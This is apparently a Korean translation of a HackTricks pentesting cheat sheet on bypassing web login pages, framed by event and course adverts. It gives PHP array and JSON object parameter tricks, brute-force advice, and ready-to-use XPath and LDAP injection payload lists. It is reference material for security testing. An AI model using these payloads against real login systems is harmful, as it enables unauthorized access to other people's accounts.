Login Bypass

htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

RootedCON스페인에서 가장 중요한 사이버 보안 행사 중 하나로 기술적인 지식을 홍보하는 데 목표를 두고 있으며, 모든 분야의 기술 및 사이버 보안 전문가들에게 뜨거운 만남의 장입니다.

일반 로그인 우회

로그인 페이지를 찾은 경우, 다음 기법을 시도해볼 수 있습니다:

  • 페이지 내부에 주석이 있는지 확인하세요 (아래로 스크롤하고 오른쪽으로 스크롤하시겠어요?)

  • 제한된 페이지에 직접 액세스할 수 있는지 확인하세요

  • 매개변수를 보내지 않도록 확인하세요 (아무 것도 보내지거나 1개만 보내세요)

  • PHP 비교 오류를 확인하세요: user[]=a&pwd=b, user=a&pwd[]=b, user[]=a&pwd[]=b

  • 콘텐츠 유형을 json으로 변경하고 json 값을 보내세요 (bool true 포함)

  • POST가 지원되지 않는다는 응답을 받으면 Content-Type: application/json과 함께 GET 요청으로 JSON을 본문에 보낼 수 있습니다.

  • Nodejs 잠재적인 구문 분석 오류를 확인하세요 (이 문서를 읽어보세요): password[password]=1

  • Nodejs는 해당 페이로드를 다음과 유사한 쿼리로 변환합니다: SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` `` password=password=1; 이로 인해 비밀번호 비트는 항상 true가 됩니다.

  • JSON 객체를 보낼 수 있다면 "password":{"password": 1}을 보내 로그인을 우회할 수 있습니다.

  • 이 로그인을 우회하려면 여전히 유효한 사용자 이름을 알고 보내야합니다.

  • mysql.createConnection을 호출할 때 Object가 전달되는 경우 "stringifyObjects":true 옵션을 추가하면 예기치 않은 동작을 차단할 수 있습니다.

  • 자격 증명을 확인하세요:

  • 사용된 기술/플랫폼의 기본 자격 증명

  • 일반적인 조합 (root, admin, password, 기술 이름, 이러한 비밀번호 중 하나를 가진 기본 사용자).

  • Cewl을 사용하여 사전을 만들고 기본 사용자 이름과 비밀번호 (있는 경우)를 추가하고 모든 단어를 사용자 이름과 비밀번호로 사용하여 무차별 대입 공격을 시도하세요.

  • 더 큰 사전을 사용하여 무차별 대입을 시도하세요 (무차별 대입)

SQL Injection 인증 우회

SQL 인젝션을 통해 로그인을 우회하는 여러 가지 기법을 여기에서 찾을 수 있습니다.

다음 페이지에서는 로그인 우회를 시도하기 위한 사용자 정의 목록을 SQL 인젝션을 통해 찾을 수 있습니다:

pageLogin bypass List

No SQL Injection 인증 우회

No SQL 인젝션을 통해 로그인을 우회하는 여러 가지 기법을 여기에서 찾을 수 있습니다.

NoSQL 인젝션은 매개변수 값을 변경해야 하므로 수동으로 테스트해야 합니다.

XPath Injection 인증 우회

XPath Injection을 통해 로그인을 우회하는 여러 가지 기법을 여기에서 찾을 수 있습니다.

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

LDAP Injection 인증 우회

여기에서는 LDAP Injection을 통한 로그인 우회를 위한 여러 가지 트릭을 찾을 수 있습니다.

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

기억하기

페이지에 "기억하기" 기능이 있는 경우, 이 기능이 어떻게 구현되었는지 확인하고 다른 계정을 탈취하기 위해 악용할 수 있는지 확인하십시오.

리디렉션

로그인 후 페이지는 일반적으로 사용자를 리디렉션합니다. 이 리디렉션을 변경하여 개방형 리디렉션을 유발할 수 있는지 확인하십시오. 웹으로 사용자를 리디렉션하면 일부 정보(코드, 쿠키 등)를 도난당할 수 있습니다.

기타 확인 사항

  • 로그인 기능을 악용하여 사용자 이름을 열거할 수 있는지 확인하십시오.

  • 비밀번호/민감한 정보 양식 입력에서 자동 완성이 활성화되어 있는지 확인하십시오: <input autocomplete="false"

​​RootedCON스페인에서 가장 중요한 사이버 보안 행사 중 하나로 유럽에서 가장 중요한 행사 중 하나입니다. 기술적인 지식을 촉진하는 것을 목표로 한 이 회의는 모든 분야의 기술 및 사이버 보안 전문가들에게 열정적인 만남의 장입니다.

htARTE (HackTricks AWS Red Team Expert)를 통해 제로에서 영웅까지 AWS 해킹 배우기!

Last updated